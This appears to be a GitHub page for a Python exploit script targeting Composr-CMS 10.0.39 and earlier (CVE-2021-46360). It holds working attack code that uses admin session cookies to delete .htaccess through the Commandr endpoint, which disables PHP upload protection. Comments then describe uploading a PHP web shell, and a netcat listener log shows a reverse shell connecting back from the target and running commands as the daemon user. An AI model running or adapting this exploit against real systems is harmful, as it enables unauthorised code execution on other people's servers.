Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
0days/Composr-CMS/Exploit.py /
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
69 lines (59 sloc)
3.12 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Authenticated Remote Code Execution in Composr-CMS Version <=10.0.39 | |
| # Remote Code Execution in Composr-CMS 10.0.39 and earlier allows remote attackers to execute arbitrary code via uploading a php shell. | |
| # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718 | |
| # Date: 12th January,2022 | |
| # CVE ID: CVE-2021-46360 | |
| # Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS | |
| # Vendor: https://compo.sr/download.htm | |
| ############################################### | |
| #Step1- We should have the admin credentials, once we logged in, we can disable the php file uploading protection, you can also do this manually via Menu- Tools=>Commandr | |
| #!/usr/bin/python3 | |
| import requests | |
| from bs4 import BeautifulSoup | |
| import time | |
| cookies = { | |
| 'has_cookies': '1', | |
| 'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c', #You need to change this as it is dynamic | |
| 'commandr_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D', | |
| 'last_visit': '1641783779', | |
| 'cms_session__b804794760e0b94ca2d3fac79ee580a9': 'ef14cc258d93a', #You need to change this as it is dynamic | |
| } | |
| headers = { | |
| 'Connection': 'keep-alive', | |
| 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36', | |
| 'Content-Type': 'application/x-www-form-urlencoded', | |
| 'Accept': '*/*', | |
| 'Origin': 'http://192.168.56.116', | |
| 'Referer': 'http://192.168.56.116/composr-cms/adminzone/index.php?page=admin-commandr', | |
| 'Accept-Language': 'en-US,en;q=0.9', | |
| } | |
| params = ( | |
| ('keep_session', 'ef14cc258d93a'), #You need to change this as it is dynamic | |
| ) | |
| data = { | |
| '_data': 'command=rm .htaccess', # This command will delete the .htaccess means disables the protection so that we can upload the .php extension file (Possibly the php shell) | |
| 'csrf_token': 'ef14cc258d93a' #You need to change this as it is dynamic | |
| } | |
| r = requests.post('http://192.168.56.116/composr-cms/data/commandr.php?keep_session=ef14cc258d93a', headers=headers, params=params, cookies=cookies, data=data, verify=False) | |
| soup = BeautifulSoup(r.text, 'html.parser') | |
| #datap=response.read() | |
| print (soup) | |
| #Step2- Now visit the Content=>File/Media Library and then upload any .php web shell ( | |
| #Step 3 Now visit http://IP_Address/composr-cms/uploads/filedump/php-reverse-shell.php and get the reverse shell: | |
| ┌─[ci@parrot]─[~] | |
| └──╼ $nc -lvvnp 4444 | |
| listening on [any] 4444 ... | |
| connect to [192.168.56.103] from (UNKNOWN) [192.168.56.116] 58984 | |
| Linux CVE-Hunting-Linux 5.11.0-44-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux | |
| 13:35:13 up 20:11, 1 user, load average: 0.00, 0.01, 0.03 | |
| USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT | |
| user :0 :0 Thu17 ?xdm? 46:51 0.04s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu | |
| uid=1(daemon) gid=1(daemon) groups=1(daemon) | |
| /bin/sh: 0: can't access tty; job control turned off | |
| $ whoami | |
| daemon | |
| $ id | |
| uid=1(daemon) gid=1(daemon) groups=1(daemon) | |
| $ pwd | |
| / | |
| $ |